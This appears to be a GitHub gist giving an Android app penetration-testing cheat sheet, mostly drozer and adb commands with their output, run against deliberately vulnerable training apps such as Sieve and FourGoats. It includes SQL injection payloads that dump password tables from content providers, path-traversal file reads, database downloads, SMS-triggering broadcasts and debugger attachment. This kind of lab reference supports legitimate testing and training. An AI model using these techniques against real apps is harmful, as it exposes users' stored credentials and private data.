Last active
April 7, 2023 17:11
-
-
Save nani1337/7bb91bc5227bec360f4337a5986bd94e to your computer and use it in GitHub Desktop.
Android-cheat sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| starting a drozer session | |
| $ adb forward tcp:31415 tcp:31415 | |
| connecting a drozer | |
| $ drozer console connect | |
| Retrieving Package Information | |
| dz> run app.package.list -f sieve | |
| We can ask drozer to provide some basic information about the package using the `app.package.info` command | |
| dz> run app.package.info -a com.mwr.example.sieve | |
| Identify the Attack Surface | |
| dz> run app.package.attacksurface com.mwr.example.sieve | |
| Launching Activities | |
| dz> run app.activity.info -a com.mwr.example.sieve | |
| Package: com.mwr.example.sieve | |
| com.mwr.example.sieve.FileSelectActivity | |
| com.mwr.example.sieve.MainLoginActivity | |
| com.mwr.example.sieve.PWList | |
| Since this activity is exported and does not require any permission, we can ask drozer to launch it: | |
| dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList | |
| Reading from Content Providers | |
| dz>run app.provider.info -a com.mwr.example.sieve | |
| Database-backed Content Providers (Data Leakage) | |
| drozer provides a scanner module that brings together various ways to guess paths and divine a list of accessible content URIs: | |
| dz> run scanner.provider.finduris -a com.mwr.example.sieve | |
| Scanning com.mwr.example.sieve... | |
| Unable to Query content://com.mwr.example.sieve.DBContentProvider/ ... | |
| Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys | |
| Accessible content URIs: | |
| content://com.mwr.example.sieve.DBContentProvider/Keys/ | |
| content://com.mwr.example.sieve.DBContentProvider/Passwords | |
| content://com.mwr.example.sieve.DBContentProvider/Passwords/ | |
| We can now use other drozer modules to retrieve information from those content URIs, or even modify the data in the database: | |
| dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical | |
| id: 1 | |
| service: Email | |
| username: incognitoguy50 | |
| password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded) email: [email protected] | |
| Database-backed Content Providers (SQL Injection) | |
| dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'" | |
| dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" | |
| Android returns a very verbose error message, showing the entire query that it tried to execute. | |
| We can fully exploit this vulnerability to list all tables in the database: | |
| dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--" | |
| dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--" | |
| File System-backed Content Providers | |
| dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts | |
| to dump the db to local machine | |
| dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data /data/com.mwr.example.sieve/databases/database.db /home/user/database.db | |
| Content Provider Vulnerabilities | |
| dz> run scanner.provider.injection -a com.mwr.example.sieve | |
| Scanning com.mwr.example.sieve... | |
| Injection in Projection: | |
| content://com.mwr.example.sieve.DBContentProvider/Keys/ | |
| content://com.mwr.example.sieve.DBContentProvider/Passwords | |
| content://com.mwr.example.sieve.DBContentProvider/Passwords/ | |
| Injection in Selection: | |
| content://com.mwr.example.sieve.DBContentProvider/Keys/ | |
| content://com.mwr.example.sieve.DBContentProvider/Passwords | |
| content://com.mwr.example.sieve.DBContentProvider/Passwords/ | |
| to test LFI OR file path travesals Or reading local files via vulnerble content providers in the app | |
| dz> run scanner.provider.traversal -a com.mwr.example.sieve | |
| Scanning com.mwr.example.sieve... | |
| Vulnerable Providers: | |
| content://com.mwr.example.sieve.FileBackupProvider/ | |
| content://com.mwr.example.sieve.FileBackupProvider | |
| to read | |
| dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts | |
| Interacting with Services | |
| dz> run app.service.info -a com.mwr.example.sieve | |
| Unintended Data Leakage | |
| pidcat | |
| $ pidcat com.mwr.example.sieve | |
| Insecure Data Storage | |
| root@cancro:/data/data/com.jianguo.funcontrol/shared_prefs # ls -al | |
| ls -al | |
| -rw-rw---- u0_a216 u0_a216 124 2015-12-19 13:51 AGREE_PROTOCOL.xml | |
| -rw-rw---- u0_a216 u0_a216 799 2016-02-06 18:42 CoreServicePrefs.xml | |
| -rw-rw---- u0_a216 u0_a216 127 2016-01-31 17:09 WebViewChromiumPrefs.xml | |
| -rw-rw---- u0_a216 u0_a216 226 2016-02-06 17:09 com.iflytek.msc.xml | |
| -rw-rw---- u0_a216 u0_a216 133 2016-01-31 17:09 com.jianguo.funcontrol_preferences.xml | |
| -rw-rw---- u0_a216 u0_a216 72801 2016-02-06 17:09 moive.sp.xml | |
| -rw-rw---- u0_a216 u0_a216 942 2016-02-06 18:42 umeng_general_config.xml | |
| root@cancro:/data/data/com.mwr.example.sieve # ls -al | |
| ls -al | |
| drwxrwx--x u0_a188 u0_a188 2015-08-03 20:51 cache | |
| drwxrwx--x u0_a188 u0_a188 2016-06-30 00:02 code_cache | |
| drwxrwx--x u0_a188 u0_a188 2014-08-01 22:32 databases | |
| lrwxrwxrwx root root 2016-06-29 22:36 lib -> /data/app-lib/com.mwr.example.sieve-1 | |
| Insufficient Transport Layer Protection | |
| Burp Suite | |
| Unintended Data Leakage | |
| # String enetered: 123456 | |
| pidcat com.mwr.example.sieve | |
| root@ubuntu:~# pidcat.py com.mwr.example.sieve | |
| art I Late-enabling -Xcheck:jni | |
| BoostFramework V mAcquireFunc method = public int com.qualcomm.qti.Performance.perfLockAcquire(int,int | |
| []) | |
| V mReleaseFunc method = public int com.qualcomm.qti.Performance.perfLockRelease() | |
| V mAcquireTouchFunc method = public int com.qualcomm.qti.Performance.perfLockAcquireTou | |
| ch(android.view.MotionEvent,android.util.DisplayMetrics,int,int[]) | |
| V mIOPStart method = public int com.qualcomm.qti.Performance.perfIOPrefetchStart(int,ja | |
| va.lang.String) | |
| V mIOPStop method = public int com.qualcomm.qti.Performance.perfIOPrefetchStop() | |
| V BoostFramework() : mPerf = com.qualcomm.qti.Performance@817a13 | |
| V BoostFramework() : mPerf = com.qualcomm.qti.Performance@804f450 | |
| OpenGLRenderer D Use EGL_SWAP_BEHAVIOR_PRESERVED: true | |
| Adreno-EGL I <qeglDrvAPI_eglInitialize:379>: EGL 1.4 QUALCOMM build: Nondeterministic_AU_msm8974_L | |
| A.BF.1.1.3_RB1__release_AU (Ia10634f51b) | |
| I OpenGL ES Shader Compiler Version: E031.29.00.00 | |
| I Build Date: 01/10/16 Sun | |
| I Local Branch: mybranch17687478 | |
| I Remote Branch: quic/LA.BF.1.1.3_rb1.8 | |
| I Local Patches: NONE | |
| I Reconstruct Branch: NOTHING | |
| OpenGLRenderer I Initialized EGL, version 1.4 | |
| ActivityThread D Loading provider com.mwr.example.sieve.DBContentProvider: com.mwr.example.sieve.DBCon | |
| tentProvider | |
| m_MainLogin D String enetered: 123456 | |
| Timeline I Timeline: Activity_launch_request time:7110102 | |
| BoostFramework V BoostFramework() : mPerf = com.qualcomm.qti.Performance@c941a0f | |
| Attacking Services | |
| dz> run app.service.info --package org.owasp.goatdroid.fourgoats | |
| Package: org.owasp.goatdroid.fourgoats | |
| org.owasp.goatdroid.fourgoats.services.LocationService | |
| Permission: null | |
| Attacking Activities | |
| The components listed in the AndroidManifest.xml file | |
| dz> org.owasp.goatdroid.fourgoats -u | |
| Package: org.owasp.goatdroid.fourgoats | |
| Exported Activities: | |
| org.owasp.goatdroid.fourgoats.activities.Main | |
| org.owasp.goatdroid.fourgoats.activities.ViewCheckin | |
| org.owasp.goatdroid.fourgoats.activities.ViewProfile | |
| org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication | |
| Activate the component | |
| dz> run app.activity.start --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.activities.ViewProfile | |
| Attacking Broadcast Receivers | |
| dz> run app.broadcast.info --package org.owasp.goatdroid.fourgoats | |
| Package: org.owasp.goatdroid.fourgoats | |
| org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver | |
| Permission: null | |
| If you would see in the AndroidManifest.xml file of FourGoats application then you will find action name is org.owasp.goatdroid.fourgoats.SOCIAL_SMS and component name as org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver . So we have to set these parameters in drozer accordingly. | |
| dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234 --extra string message "it's test" | |
| or directly use | |
| adb shell | |
| am broadcast -a theBroadcast -n com.android.insecurebankv2/com.android.insecurebankv2.MyBroadCastReceiver --es phonenumber 5554 –es newpass qwreet@123! | |
| Exploiting Debuggable Applications | |
| $ adb jdwp | |
| 347 | |
| 602 | |
| 710 | |
| 724 | |
| 737 | |
| 811 | |
| 929 | |
| 1202 | |
| 1320 | |
| 1362 | |
| 1383 | |
| 1405 | |
| 1931 | |
| 2022 | |
| 2207 | |
| 2222 | |
| 2239 | |
| 2253 | |
| 2269 | |
| 2283 | |
| 2310 | |
| $ adb shell ps | grep '1931' | |
| u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote | |
| C:\Users\syandava\Desktop\sieve\dist | |
| $ adb shell ps | grep sieve | |
| u0_a59 1320 177 570756 43612 ffffffff b769007b S com.mwr.example.sieve | |
| u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote | |
| $ adb shell | |
| root@vbox86p:/ # run-as com.mwr.example.sieve | |
| run-as com.mwr.example.sieve | |
| root@vbox86p:/data/data/com.mwr.example.sieve $ ls -l | |
| ls -l | |
| drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 cache | |
| drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 databases | |
| lrwxrwxrwx install install 2017-12-05 22:42 lib -> /data/app-lib/com.mwr.example.sieve-1 | |
| root@vbox86p:/data/data/com.mwr.example.sieve $ exit | |
| exit | |
| root@vbox86p:/ # exit | |
| exit | |
| C:\Users\syandava\Desktop\sieve\dist | |
| $ adb shell run-as com.mwr.example.sieve /data/data/ | |
| run-as: exec failed for /data/data/ Error:Permission denied | |
| And Some other ways | |
| $ adb jdwp | |
| Next we'll need to forward our debugging session to a port we can connect to with our debugger: | |
| $adb forward tcp:8000 jdwp:498 | |
| Finally we can attach the debugger with: | |
| $jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8000 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment